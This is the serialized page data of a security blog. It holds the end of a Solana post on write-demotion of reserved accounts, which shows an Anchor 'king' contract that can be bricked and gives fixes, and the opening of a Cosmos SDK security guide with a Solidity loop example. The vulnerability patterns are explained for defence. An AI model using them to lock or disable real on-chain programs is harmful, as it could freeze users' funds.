maintains a ",{"type":25,"tag":162,"props":79005,"children":79007},{"href":78973,"rel":79006},[166],[79008],{"type":31,"value":78977},{"type":31,"value":79010},", which includes addresses with special semantics — such as built-in programs, precompiles, and sysvars.",{"type":25,"tag":38,"props":79012,"children":79013},{},[79014,79016,79023,79025,79030],{"type":31,"value":79015},"These accounts may initially behave like normal accounts. However, once they become reserved after a ",{"type":25,"tag":162,"props":79017,"children":79020},{"href":79018,"rel":79019},"https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474",[166],[79021],{"type":31,"value":79022},"feature gate is actived",{"type":31,"value":79024},", the runtime will ",{"type":25,"tag":9273,"props":79026,"children":79027},{},[79028],{"type":31,"value":79029},"automatically demote them to read-only",{"type":31,"value":79031},", even if the transaction marked them as writable.",{"type":25,"tag":206,"props":79033,"children":79035},{"className":6915,"code":79034,"language":6914,"meta":7,"style":7},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n// Update active set of reserved account keys which are not allowed to be write locked\nself.reserved_account_keys = {\n    let mut reserved_keys = ReservedAccountKeys::clone(&self.reserved_account_keys);\n    reserved_keys.update_active_set(&self.feature_set);\n    Arc::new(reserved_keys)\n};\n",[79036],{"type":25,"tag":82,"props":79037,"children":79038},{"__ignoreMap":7},[79039,79047,79055,79079,79133,79171,79200],{"type":25,"tag":216,"props":79040,"children":79041},{"class":6922,"line":6923},[79042],{"type":25,"tag":216,"props":79043,"children":79044},{"style":6927},[79045],{"type":31,"value":79046},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n",{"type":25,"tag":216,"props":79048,"children":79049},{"class":6922,"line":6769},[79050],{"type":25,"tag":216,"props":79051,"children":79052},{"style":6927},[79053],{"type":31,"value":79054},"// Update active set of reserved account keys which are not allowed to be write locked\n",{"type":25,"tag":216,"props":79056,"children":79057},{"class":6922,"line":6778},[79058,79062,79066,79071,79075],{"type":25,"tag":216,"props":79059,"children":79060},{"style":6936},[79061],{"type":31,"value":17670},{"type":25,"tag":216,"props":79063,"children":79064},{"style":6953},[79065],{"type":31,"value":179},{"type":25,"tag":216,"props":79067,"children":79068},{"style":6964},[79069],{"type":31,"value":79070},"reserved_account_keys ",{"type":25,"tag":216,"props":79072,"children":79073},{"style":6953},[79074],{"type":31,"value":266},{"type":25,"tag":216,"props":79076,"children":79077},{"style":6964},[79078],{"type":31,"value":7241},{"type":25,"tag":216,"props":79080,"children":79081},{"class":6922,"line":7005},[79082,79086,79090,79095,79099,79104,79108,79112,79116,79120,79124,79128],{"type":25,"tag":216,"props":79083,"children":79084},{"style":6936},[79085],{"type":31,"value":6939},{"type":25,"tag":216,"props":79087,"children":79088},{"style":6936},[79089],{"type":31,"value":6944},{"type":25,"tag":216,"props":79091,"children":79092},{"style":6947},[79093],{"type":31,"value":79094}," reserved_keys",{"type":25,"tag":216,"props":79096,"children":79097},{"style":6953},[79098],{"type":31,"value":6956},{"type":25,"tag":216,"props":79100,"children":79101},{"style":7375},[79102],{"type":31,"value":79103}," ReservedAccountKeys",{"type":25,"tag":216,"props":79105,"children":79106},{"style":6953},[79107],{"type":31,"value":7438},{"type":25,"tag":216,"props":79109,"children":79110},{"style":7047},[79111],{"type":31,"value":19377},{"type":25,"tag":216,"props":79113,"children":79114},{"style":6964},[79115],{"type":31,"value":1850},{"type":25,"tag":216,"props":79117,"children":79118},{"style":6953},[79119],{"type":31,"value":7059},{"type":25,"tag":216,"props":79121,"children":79122},{"style":6936},[79123],{"type":31,"value":17670},{"type":25,"tag":216,"props":79125,"children":79126},{"style":6953},[79127],{"type":31,"value":179},{"type":25,"tag":216,"props":79129,"children":79130},{"style":6964},[79131],{"type":31,"value":79132},"reserved_account_keys);\n",{"type":25,"tag":216,"props":79134,"children":79135},{"class":6922,"line":7110},[79136,79141,79145,79150,79154,79158,79162,79166],{"type":25,"tag":216,"props":79137,"children":79138},{"style":6947},[79139],{"type":31,"value":79140},"    reserved_keys",{"type":25,"tag":216,"props":79142,"children":79143},{"style":6953},[79144],{"type":31,"value":179},{"type":25,"tag":216,"props":79146,"children":79147},{"style":7047},[79148],{"type":31,"value":79149},"update_active_set",{"type":25,"tag":216,"props":79151,"children":79152},{"style":6964},[79153],{"type":31,"value":1850},{"type":25,"tag":216,"props":79155,"children":79156},{"style":6953},[79157],{"type":31,"value":7059},{"type":25,"tag":216,"props":79159,"children":79160},{"style":6936},[79161],{"type":31,"value":17670},{"type":25,"tag":216,"props":79163,"children":79164},{"style":6953},[79165],{"type":31,"value":179},{"type":25,"tag":216,"props":79167,"children":79168},{"style":6964},[79169],{"type":31,"value":79170},"feature_set);\n",{"type":25,"tag":216,"props":79172,"children":79173},{"class":6922,"line":7216},[79174,79179,79183,79187,79191,79196],{"type":25,"tag":216,"props":79175,"children":79176},{"style":7375},[79177],{"type":31,"value":79178},"    Arc",{"type":25,"tag":216,"props":79180,"children":79181},{"style":6953},[79182],{"type":31,"value":7438},{"type":25,"tag":216,"props":79184,"children":79185},{"style":7047},[79186],{"type":31,"value":19080},{"type":25,"tag":216,"props":79188,"children":79189},{"style":6964},[79190],{"type":31,"value":1850},{"type":25,"tag":216,"props":79192,"children":79193},{"style":6947},[79194],{"type":31,"value":79195},"reserved_keys",{"type":25,"tag":216,"props":79197,"children":79198},{"style":6964},[79199],{"type":31,"value":7107},{"type":25,"tag":216,"props":79201,"children":79202},{"class":6922,"line":7244},[79203],{"type":25,"tag":216,"props":79204,"children":79205},{"style":6964},[79206],{"type":31,"value":20536},{"type":25,"tag":630,"props":79208,"children":79210},{"id":79209},"consequences-silent-failures-and-bricked-programs",[79211],{"type":31,"value":79212},"Consequences: Silent Failures and Bricked Programs",{"type":25,"tag":38,"props":79214,"children":79215},{},[79216],{"type":31,"value":79217},"This behavior is especially dangerous when you constrain a program to be writable, for example, with anchor, it's pretty common to use the account(mut) constraint:",{"type":25,"tag":206,"props":79219,"children":79221},{"className":6915,"code":79220,"language":6914,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n    #[account(mut)]\n    pub throne: Account\u003C'info, Throne>,\n\n    #[account(mut, constraint = old_king.key() == throne.king)]\n    pub old_king: AccountInfo\u003C'info>,\n\n    #[account(mut)]\n    pub new_king: AccountInfo\u003C'info>,\n\n    #[account(mut)]\n    pub payer: Signer\u003C'info>,\n}\n",[79222],{"type":25,"tag":82,"props":79223,"children":79224},{"__ignoreMap":7},[79225,79240,79267,79282,79321,79328,79375,79406,79413,79428,79459,79466,79481,79512],{"type":25,"tag":216,"props":79226,"children":79227},{"class":6922,"line":6923},[79228,79232,79236],{"type":25,"tag":216,"props":79229,"children":79230},{"style":6964},[79231],{"type":31,"value":26783},{"type":25,"tag":216,"props":79233,"children":79234},{"style":7375},[79235],{"type":31,"value":26788},{"type":25,"tag":216,"props":79237,"children":79238},{"style":6964},[79239],{"type":31,"value":24218},{"type":25,"tag":216,"props":79241,"children":79242},{"class":6922,"line":6769},[79243,79247,79251,79255,79259,79263],{"type":25,"tag":216,"props":79244,"children":79245},{"style":6936},[79246],{"type":31,"value":17647},{"type":25,"tag":216,"props":79248,"children":79249},{"style":6936},[79250],{"type":31,"value":25111},{"type":25,"tag":216,"props":79252,"children":79253},{"style":7375},[79254],{"type":31,"value":75280},{"type":25,"tag":216,"props":79256,"children":79257},{"style":6964},[79258],{"type":31,"value":26868},{"type":25,"tag":216,"props":79260,"children":79261},{"style":7375},[79262],{"type":31,"value":26873},{"type":25,"tag":216,"props":79264,"children":79265},{"style":6964},[79266],{"type":31,"value":11233},{"type":25,"tag":216,"props":79268,"children":79269},{"class":6922,"line":6778},[79270,79274,79278],{"type":25,"tag":216,"props":79271,"children":79272},{"style":6964},[79273],{"type":31,"value":27075},{"type":25,"tag":216,"props":79275,"children":79276},{"style":6936},[79277],{"type":31,"value":7691},{"type":25,"tag":216,"props":79279,"children":79280},{"style":6964},[79281],{"type":31,"value":24218},{"type":25,"tag":216,"props":79283,"children":79284},{"class":6922,"line":7005},[79285,79289,79293,79297,79301,79305,79309,79313,79317],{"type":25,"tag":216,"props":79286,"children":79287},{"style":6936},[79288],{"type":31,"value":24803},{"type":25,"tag":216,"props":79290,"children":79291},{"style":6947},[79292],{"type":31,"value":75319},{"type":25,"tag":216,"props":79294,"children":79295},{"style":6953},[79296],{"type":31,"value":1472},{"type":25,"tag":216,"props":79298,"children":79299},{"style":7375},[79300],{"type":31,"value":27040},{"type":25,"tag":216,"props":79302,"children":79303},{"style":6964},[79304],{"type":31,"value":26868},{"type":25,"tag":216,"props":79306,"children":79307},{"style":7375},[79308],{"type":31,"value":26873},{"type":25,"tag":216,"props":79310,"children":79311},{"style":6964},[79312],{"type":31,"value":7026},{"type":25,"tag":216,"props":79314,"children":79315},{"style":7375},[79316],{"type":31,"value":75344},{"type":25,"tag":216,"props":79318,"children":79319},{"style":6964},[79320],{"type":31,"value":10089},{"type":25,"tag":216,"props":79322,"children":79323},{"class":6922,"line":7110},[79324],{"type":25,"tag":216,"props":79325,"children":79326},{"emptyLinePlaceholder":16},[79327],{"type":31,"value":7642},{"type":25,"tag":216,"props":79329,"children":79330},{"class":6922,"line":7216},[79331,79335,79339,79343,79347,79351,79355,79359,79363,79367,79371],{"type":25,"tag":216,"props":79332,"children":79333},{"style":6964},[79334],{"type":31,"value":27075},{"type":25,"tag":216,"props":79336,"children":79337},{"style":6936},[79338],{"type":31,"value":7691},{"type":25,"tag":216,"props":79340,"children":79341},{"style":6964},[79342],{"type":31,"value":75379},{"type":25,"tag":216,"props":79344,"children":79345},{"style":6953},[79346],{"type":31,"value":266},{"type":25,"tag":216,"props":79348,"children":79349},{"style":6964},[79350],{"type":31,"value":75388},{"type":25,"tag":216,"props":79352,"children":79353},{"style":6953},[79354],{"type":31,"value":179},{"type":25,"tag":216,"props":79356,"children":79357},{"style":6964},[79358],{"type":31,"value":75397},{"type":25,"tag":216,"props":79360,"children":79361},{"style":6953},[79362],{"type":31,"value":12528},{"type":25,"tag":216,"props":79364,"children":79365},{"style":6964},[79366],{"type":31,"value":75319},{"type":25,"tag":216,"props":79368,"children":79369},{"style":6953},[79370],{"type":31,"value":179},{"type":25,"tag":216,"props":79372,"children":79373},{"style":6964},[79374],{"type":31,"value":75414},{"type":25,"tag":216,"props":79376,"children":79377},{"class":6922,"line":7244},[79378,79382,79386,79390,79394,79398,79402],{"type":25,"tag":216,"props":79379,"children":79380},{"style":6936},[79381],{"type":31,"value":24803},{"type":25,"tag":216,"props":79383,"children":79384},{"style":6947},[79385],{"type":31,"value":75388},{"type":25,"tag":216,"props":79387,"children":79388},{"style":6953},[79389],{"type":31,"value":1472},{"type":25,"tag":216,"props":79391,"children":79392},{"style":7375},[79393],{"type":31,"value":29356},{"type":25,"tag":216,"props":79395,"children":79396},{"style":6964},[79397],{"type":31,"value":26868},{"type":25,"tag":216,"props":79399,"children":79400},{"style":7375},[79401],{"type":31,"value":26873},{"type":25,"tag":216,"props":79403,"children":79404},{"style":6964},[79405],{"type":31,"value":10089},{"type":25,"tag":216,"props":79407,"children":79408},{"class":6922,"line":7257},[79409],{"type":25,"tag":216,"props":79410,"children":79411},{"emptyLinePlaceholder":16},[79412],{"type":31,"value":7642},{"type":25,"tag":216,"props":79414,"children":79415},{"class":6922,"line":7275},[79416,79420,79424],{"type":25,"tag":216,"props":79417,"children":79418},{"style":6964},[79419],{"type":31,"value":27075},{"type":25,"tag":216,"props":79421,"children":79422},{"style":6936},[79423],{"type":31,"value":7691},{"type":25,"tag":216,"props":79425,"children":79426},{"style":6964},[79427],{"type":31,"value":24218},{"type":25,"tag":216,"props":79429,"children":79430},{"class":6922,"line":7296},[79431,79435,79439,79443,79447,79451,79455],{"type":25,"tag":216,"props":79432,"children":79433},{"style":6936},[79434],{"type":31,"value":24803},{"type":25,"tag":216,"props":79436,"children":79437},{"style":6947},[79438],{"type":31,"value":75487},{"type":25,"tag":216,"props":79440,"children":79441},{"style":6953},[79442],{"type":31,"value":1472},{"type":25,"tag":216,"props":79444,"children":79445},{"style":7375},[79446],{"type":31,"value":29356},{"type":25,"tag":216,"props":79448,"children":79449},{"style":6964},[79450],{"type":31,"value":26868},{"type":25,"tag":216,"props":79452,"children":79453},{"style":7375},[79454],{"type":31,"value":26873},{"type":25,"tag":216,"props":79456,"children":79457},{"style":6964},[79458],{"type":31,"value":10089},{"type":25,"tag":216,"props":79460,"children":79461},{"class":6922,"line":7305},[79462],{"type":25,"tag":216,"props":79463,"children":79464},{"emptyLinePlaceholder":16},[79465],{"type":31,"value":7642},{"type":25,"tag":216,"props":79467,"children":79468},{"class":6922,"line":7557},[79469,79473,79477],{"type":25,"tag":216,"props":79470,"children":79471},{"style":6964},[79472],{"type":31,"value":27075},{"type":25,"tag":216,"props":79474,"children":79475},{"style":6936},[79476],{"type":31,"value":7691},{"type":25,"tag":216,"props":79478,"children":79479},{"style":6964},[79480],{"type":31,"value":24218},{"type":25,"tag":216,"props":79482,"children":79483},{"class":6922,"line":7574},[79484,79488,79492,79496,79500,79504,79508],{"type":25,"tag":216,"props":79485,"children":79486},{"style":6936},[79487],{"type":31,"value":24803},{"type":25,"tag":216,"props":79489,"children":79490},{"style":6947},[79491],{"type":31,"value":46206},{"type":25,"tag":216,"props":79493,"children":79494},{"style":6953},[79495],{"type":31,"value":1472},{"type":25,"tag":216,"props":79497,"children":79498},{"style":7375},[79499],{"type":31,"value":27104},{"type":25,"tag":216,"props":79501,"children":79502},{"style":6964},[79503],{"type":31,"value":26868},{"type":25,"tag":216,"props":79505,"children":79506},{"style":7375},[79507],{"type":31,"value":26873},{"type":25,"tag":216,"props":79509,"children":79510},{"style":6964},[79511],{"type":31,"value":10089},{"type":25,"tag":216,"props":79513,"children":79514},{"class":6922,"line":7591},[79515],{"type":25,"tag":216,"props":79516,"children":79517},{"style":6964},[79518],{"type":31,"value":7874},{"type":25,"tag":38,"props":79520,"children":79521},{},[79522,79524,79530,79532,79538],{"type":31,"value":79523},"This works fine — until one day, ",{"type":25,"tag":82,"props":79525,"children":79527},{"className":79526},[],[79528],{"type":31,"value":79529},"old_king",{"type":31,"value":79531}," is silently demoted. Suddenly, the ",{"type":25,"tag":82,"props":79533,"children":79535},{"className":79534},[],[79536],{"type":31,"value":79537},"#[account(mut)]",{"type":31,"value":79539}," constraint fails, and your program is bricked. Even though you're passing a writable account in the transaction, the runtime has made a unilateral decision to override that.",{"type":25,"tag":630,"props":79541,"children":79543},{"id":79542},"real-world-example-write-demotion-with-secp256r1_program",[79544,79546],{"type":31,"value":79545},"Real-World Example: Write-Demotion with ",{"type":25,"tag":82,"props":79547,"children":79549},{"className":79548},[],[79550],{"type":31,"value":79551},"secp256r1_program",{"type":25,"tag":38,"props":79553,"children":79554},{},[79555,79557,79562],{"type":31,"value":79556},"Here’s a concrete example of the write-demotion trap playing out on mainnet — involving ",{"type":25,"tag":82,"props":79558,"children":79560},{"className":79559},[],[79561],{"type":31,"value":79551},{"type":31,"value":79563},", a precompiled program gated behind a feature flag:",{"type":25,"tag":206,"props":79565,"children":79567},{"className":6915,"code":79566,"language":6914,"meta":7,"style":7},"ReservedAccount::new_pending(\n    secp256r1_program::id(),\n    feature_set::enable_secp256r1_precompile::id(),\n)\n",[79568],{"type":25,"tag":82,"props":79569,"children":79570},{"__ignoreMap":7},[79571,79592,79612,79641],{"type":25,"tag":216,"props":79572,"children":79573},{"class":6922,"line":6923},[79574,79579,79583,79588],{"type":25,"tag":216,"props":79575,"children":79576},{"style":7375},[79577],{"type":31,"value":79578},"ReservedAccount",{"type":25,"tag":216,"props":79580,"children":79581},{"style":6953},[79582],{"type":31,"value":7438},{"type":25,"tag":216,"props":79584,"children":79585},{"style":7047},[79586],{"type":31,"value":79587},"new_pending",{"type":25,"tag":216,"props":79589,"children":79590},{"style":6964},[79591],{"type":31,"value":7420},{"type":25,"tag":216,"props":79593,"children":79594},{"class":6922,"line":6769},[79595,79600,79604,79608],{"type":25,"tag":216,"props":79596,"children":79597},{"style":6964},[79598],{"type":31,"value":79599},"    secp256r1_program",{"type":25,"tag":216,"props":79601,"children":79602},{"style":6953},[79603],{"type":31,"value":7438},{"type":25,"tag":216,"props":79605,"children":79606},{"style":7047},[79607],{"type":31,"value":7443},{"type":25,"tag":216,"props":79609,"children":79610},{"style":6964},[79611],{"type":31,"value":7448},{"type":25,"tag":216,"props":79613,"children":79614},{"class":6922,"line":6778},[79615,79620,79624,79629,79633,79637],{"type":25,"tag":216,"props":79616,"children":79617},{"style":6964},[79618],{"type":31,"value":79619},"    feature_set",{"type":25,"tag":216,"props":79621,"children":79622},{"style":6953},[79623],{"type":31,"value":7438},{"type":25,"tag":216,"props":79625,"children":79626},{"style":6964},[79627],{"type":31,"value":79628},"enable_secp256r1_precompile",{"type":25,"tag":216,"props":79630,"children":79631},{"style":6953},[79632],{"type":31,"value":7438},{"type":25,"tag":216,"props":79634,"children":79635},{"style":7047},[79636],{"type":31,"value":7443},{"type":25,"tag":216,"props":79638,"children":79639},{"style":6964},[79640],{"type":31,"value":7448},{"type":25,"tag":216,"props":79642,"children":79643},{"class":6922,"line":7005},[79644],{"type":25,"tag":216,"props":79645,"children":79646},{"style":6964},[79647],{"type":31,"value":7107},{"type":25,"tag":38,"props":79649,"children":79650},{},[79651,79653,79658,79660,79666],{"type":31,"value":79652},"Before the ",{"type":25,"tag":82,"props":79654,"children":79656},{"className":79655},[],[79657],{"type":31,"value":79628},{"type":31,"value":79659}," feature is activated, this account behaves like any ordinary one. You can assign ",{"type":25,"tag":82,"props":79661,"children":79663},{"className":79662},[],[79664],{"type":31,"value":79665},"secp256r1_program::id()",{"type":31,"value":79667}," as the king in a contract.",{"type":25,"tag":38,"props":79669,"children":79670},{},[79671,79673,79678],{"type":31,"value":79672},"But once the feature is flipped on, the runtime silently marks it as read-only, blocking any future writes. As a result, ",{"type":25,"tag":82,"props":79674,"children":79676},{"className":79675},[],[79677],{"type":31,"value":79665},{"type":31,"value":79679}," becomes the eternal king, and no one can dethrone it.",{"type":25,"tag":630,"props":79681,"children":79683},{"id":79682},"fix-3-preventing-write-demotion-pitfalls",[79684],{"type":31,"value":79685},"Fix 3: Preventing Write-Demotion Pitfalls",{"type":25,"tag":38,"props":79687,"children":79688},{},[79689,79691,79696],{"type":31,"value":79690},"Alright, let’s try to fix this ",{"type":25,"tag":64,"props":79692,"children":79693},{},[79694],{"type":31,"value":79695},"yet another",{"type":31,"value":79697}," edge case — and hopefully close the book on it.",{"type":25,"tag":630,"props":79699,"children":79701},{"id":79700},"attempt-1-block-known-reserved-accounts",[79702],{"type":31,"value":79703},"Attempt 1: Block Known Reserved Accounts",{"type":25,"tag":38,"props":79705,"children":79706},{},[79707],{"type":31,"value":79708},"One naive solution is to reject any known reserved account, for example:",{"type":25,"tag":206,"props":79710,"children":79712},{"className":44324,"code":79711,"language":44326,"meta":7,"style":7},"    pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n+       assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",[79713],{"type":25,"tag":82,"props":79714,"children":79715},{"__ignoreMap":7},[79716,79724],{"type":25,"tag":216,"props":79717,"children":79718},{"class":6922,"line":6923},[79719],{"type":25,"tag":216,"props":79720,"children":79721},{"style":6964},[79722],{"type":31,"value":79723},"    pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n",{"type":25,"tag":216,"props":79725,"children":79726},{"class":6922,"line":6769},[79727],{"type":25,"tag":216,"props":79728,"children":79729},{"style":6989},[79730],{"type":31,"value":79731},"+       assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",{"type":25,"tag":38,"props":79733,"children":79734},{},[79735,79737,79742],{"type":31,"value":79736},"This works in the short term, but doesn’t scale — you can’t predict all future additions to the ",{"type":25,"tag":82,"props":79738,"children":79740},{"className":79739},[],[79741],{"type":31,"value":79578},{"type":31,"value":79743}," list. The moment a new reserved account is introduced, your program becomes vulnerable again.",{"type":25,"tag":630,"props":79745,"children":79747},{"id":79746},"attempt-2-use-a-pda-vault",[79748],{"type":31,"value":79749},"Attempt 2: Use a PDA Vault",{"type":25,"tag":38,"props":79751,"children":79752},{},[79753,79755,79760],{"type":31,"value":79754},"A more future-proof fix is to avoid ",{"type":25,"tag":9273,"props":79756,"children":79757},{},[79758],{"type":31,"value":79759},"transferring lamports to arbitrary accounts",{"type":31,"value":79761}," altogether.",{"type":25,"tag":38,"props":79763,"children":79764},{},[79765],{"type":31,"value":79766},"A clean approach would be to store the refund lamports in a PDA vault owned by your program. This prevents your logic from depending on accounts you don’t have complete control over, and sidesteps any risk of write-demotion or future account restrictions.",{"type":25,"tag":26,"props":79768,"children":79770},{"id":79769},"final-thoughts",[79771],{"type":31,"value":79772},"Final Thoughts",{"type":25,"tag":38,"props":79774,"children":79775},{},[79776],{"type":31,"value":79777},"Transferring lamports on Solana is not always straightforward and carries potential risks. Account constraints alone are insufficient to ensure safety, especially when dealing with runtime-specific edge cases.",{"type":25,"tag":38,"props":79779,"children":79780},{},[79781],{"type":31,"value":79782},"We can safely transfer lamports to an account under the following conditions:",{"type":25,"tag":2039,"props":79784,"children":79785},{},[79786,79791,79796],{"type":25,"tag":2043,"props":79787,"children":79788},{},[79789],{"type":31,"value":79790},"It's not executable.",{"type":25,"tag":2043,"props":79792,"children":79793},{},[79794],{"type":31,"value":79795},"Its balance, after the transfer, remains rent-exempt.",{"type":25,"tag":2043,"props":79797,"children":79798},{},[79799],{"type":31,"value":79800},"It's not a reserved account.",{"type":25,"tag":38,"props":79802,"children":79803},{},[79804],{"type":31,"value":79805},"This issue is not purely theoretical; it has impacted real-world programs. One significant case was recently reported to Jito via the bug bounty, which could have resulted in incorrect tip payments.",{"type":25,"tag":9316,"props":79807,"children":79808},{},[79809],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":79811},[79812,79813,79814,79820],{"id":32975,"depth":6769,"text":32978},{"id":75194,"depth":6769,"text":75197},{"id":76301,"depth":6769,"text":76304,"children":79815},[79816,79817,79819],{"id":76307,"depth":6778,"text":76310},{"id":76994,"depth":6778,"text":79818},"Bug 2: Writable but Untouchable — set_lamports Fails",{"id":78299,"depth":6778,"text":78302},{"id":79769,"depth":6769,"text":79772},"content:blog:2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol",{"_path":79825,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":79826,"description":79827,"date":79828,"author":79829,"image":79830,"isFeatured":16,"onBlogPage":16,"tags":79832,"body":79835,"_type":6798,"_id":93719,"_source":6800,"_file":93720,"_stem":93721,"_extension":6803},"/blog/2025-06-10-cosmos-security","Cosmos Security: An Otter's Guide","From infinite loops and map determinism to AnteHandler missteps and storage key collisions, we highlight real-world vulnerabilities and actionable advice for building safer Cosmos-based projects.","2025-06-10","james",{"src":79831,"width":17580,"height":17580},"/posts/cosmos-security/title.png",[79833,79834],"cosmos-sdk","security",{"type":22,"children":79836,"toc":93697},[79837,79841,79846,79851,79857,79862,79867,79872,80133,80622,80641,80646,80651,80656,80662,80667,80702,80712,81219,81239,81252,81258,81263,81268,81509,81514,81522,81534,81896,81901,81906,81942,81951,82377,82398,82404,82424,82445,82464,82496,82508,82520,83174,83202,83211,83651,83678,83698,83703,83724,83773,83782,85014,85042,85048,85053,85058,85078,85365,85399,85580,85585,85590,85634,85643,86835,87086,87099,87105,87139,87144,87207,87212,87232,87251,87263,87282,87974,87979,87984,88012,88021,88905,88932,88938,88958,88963,88976,89150,89163,89254,89259,89267,89277,89427,89432,89452,89460,89465,89863,89875,89880,89921,89932,89952,90260,90265,91190,91202,91210,91215,92208,92213,92225,92245,92264,93178,93235,93341,93353,93358,93363,93391,93400,93626,93652,93665,93679,93683,93688,93693],{"type":25,"tag":26,"props":79838,"children":79839},{"id":32975},[79840],{"type":31,"value":32978},{"type":25,"tag":38,"props":79842,"children":79843},{},[79844],{"type":31,"value":79845},"The Cosmos SDK is an \"L1 toolkit\" for developers. It provides an open-source tool that enhances the ability to build application-specific L1 chains, all while prioritizing flexibility and control over the entire runtime environment. Unfortunately, with the convenience of the Cosmos SDK, security can be an oversight.",{"type":25,"tag":38,"props":79847,"children":79848},{},[79849],{"type":31,"value":79850},"In this comprehensive blog post, we break down security issues that are often overseen by developers, supported by real-world examples from live projects. Our goal is to provide a practical exploration of security vulnerabilities while also offering insights on how developers can identify and address these issues on their own.",{"type":25,"tag":26,"props":79852,"children":79854},{"id":79853},"its-loopin-time",[79855],{"type":31,"value":79856},"It's Loopin' Time",{"type":25,"tag":38,"props":79858,"children":79859},{},[79860],{"type":31,"value":79861},"There are notable differences in building app-specific L1s using the SDK and building contracts on established L1 chains. It is especially crucial to recognize that maintaining the stability of a blockchain is dependent on the developer.",{"type":25,"tag":38,"props":79863,"children":79864},{},[79865],{"type":31,"value":79866},"Below, we begin to demonstrate the differences between writing smart contracts with Solidity vs developing L1 with the Cosmos SDK.",{"type":25,"tag":38,"props":79868,"children":79869},{},[79870],{"type":31,"value":79871},"Here is a simple example for reference:",{"type":25,"tag":206,"props":79873,"children":79875},{"code":79874,"language":8422,"meta":7,"className":8423,"style":7},"function sumWithStride(\n    uint64 start,\n    uint64 stride,\n    uint64[] memory arr\n) public returns (uint64) {\n    uint64 idx = start;\n    uint64 sum = 0;\n    uint64 end = arr.length;\n\n    while (idx \u003C end) {\n        sum += arr[idx];\n        idx += stride;\n    }\n    return sum;\n}\n",[79876],{"type":25,"tag":82,"props":79877,"children":79878},{"__ignoreMap":7},[79879,79895,79912,79928,79950,79979,80000,80024,80045,80052,80073,80090,80107,80114,80126],{"type":25,"tag":216,"props":79880,"children":79881},{"class":6922,"line":6923},[79882,79886,79891],{"type":25,"tag":216,"props":79883,"children":79884},{"style":6936},[79885],{"type":31,"value":35339},{"type":25,"tag":216,"props":79887,"children":79888},{"style":7047},[79889],{"type":31,"value":79890}," sumWithStride",{"type":25,"tag":216,"props":79892,"children":79893},{"style":6964},[79894],{"type":31,"value":7420},{"type":25,"tag":216,"props":79896,"children":79897},{"class":6922,"line":6769},[79898,79903,79908],{"type":25,"tag":216,"props":79899,"children":79900},{"style":7375},[79901],{"type":31,"value":79902},"    uint64",{"type":25,"tag":216,"props":79904,"children":79905},{"style":6947},[79906],{"type":31,"value":79907}," start",{"type":25,"tag":216,"props":79909,"children":79910},{"style":6964},[79911],{"type":31,"value":7465},{"type":25,"tag":216,"props":79913,"children":79914},{"class":6922,"line":6778},[79915,79919,79924],{"type":25,"tag":216,"props":79916,"children":79917},{"style":7375},[79918],{"type":31,"value":79902},{"type":25,"tag":216,"props":79920,"children":79921},{"style":6947},[79922],{"type":31,"value":79923}," stride",{"type":25,"tag":216,"props":79925,"children":79926},{"style":6964},[79927],{"type":31,"value":7465},{"type":25,"tag":216,"props":79929,"children":79930},{"class":6922,"line":7005},[79931,79935,79940,79945],{"type":25,"tag":216,"props":79932,"children":79933},{"style":7375},[79934],{"type":31,"value":79902},{"type":25,"tag":216,"props":79936,"children":79937},{"style":6964},[79938],{"type":31,"value":79939},"[] ",{"type":25,"tag":216,"props":79941,"children":79942},{"style":6936},[79943],{"type":31,"value":79944},"memory",{"type":25,"tag":216,"props":79946,"children":79947},{"style":6947},[79948],{"type":31,"value":79949}," arr\n",{"type":25,"tag":216,"props":79951,"children":79952},{"class":6922,"line":7110},[79953,79957,79961,79966,79970,79975],{"type":25,"tag":216,"props":79954,"children":79955},{"style":6964},[79956],{"type":31,"value":7036},{"type":25,"tag":216,"props":79958,"children":79959},{"style":6936},[79960],{"type":31,"value":65643},{"type":25,"tag":216,"props":79962,"children":79963},{"style":6973},[79964],{"type":31,"value":79965}," returns",{"type":25,"tag":216,"props":79967,"children":79968},{"style":6964},[79969],{"type":31,"value":7016},{"type":25,"tag":216,"props":79971,"children":79972},{"style":7375},[79973],{"type":31,"value":79974},"uint64",{"type":25,"tag":216,"props":79976,"children":79977},{"style":6964},[79978],{"type":31,"value":18761},{"type":25,"tag":216,"props":79980,"children":79981},{"class":6922,"line":7216},[79982,79986,79991,79995],{"type":25,"tag":216,"props":79983,"children":79984},{"style":7375},[79985],{"type":31,"value":79902},{"type":25,"tag":216,"props":79987,"children":79988},{"style":6964},[79989],{"type":31,"value":79990}," idx ",{"type":25,"tag":216,"props":79992,"children":79993},{"style":6953},[79994],{"type":31,"value":266},{"type":25,"tag":216,"props":79996,"children":79997},{"style":6964},[79998],{"type":31,"value":79999}," start;\n",{"type":25,"tag":216,"props":80001,"children":80002},{"class":6922,"line":7244},[80003,80007,80012,80016,80020],{"type":25,"tag":216,"props":80004,"children":80005},{"style":7375},[80006],{"type":31,"value":79902},{"type":25,"tag":216,"props":80008,"children":80009},{"style":6964},[80010],{"type":31,"value":80011}," sum ",{"type":25,"tag":216,"props":80013,"children":80014},{"style":6953},[80015],{"type":31,"value":266},{"type":25,"tag":216,"props":80017,"children":80018},{"style":6989},[80019],{"type":31,"value":6992},{"type":25,"tag":216,"props":80021,"children":80022},{"style":6964},[80023],{"type":31,"value":6967},{"type":25,"tag":216,"props":80025,"children":80026},{"class":6922,"line":7257},[80027,80031,80036,80040],{"type":25,"tag":216,"props":80028,"children":80029},{"style":7375},[80030],{"type":31,"value":79902},{"type":25,"tag":216,"props":80032,"children":80033},{"style":6964},[80034],{"type":31,"value":80035}," end 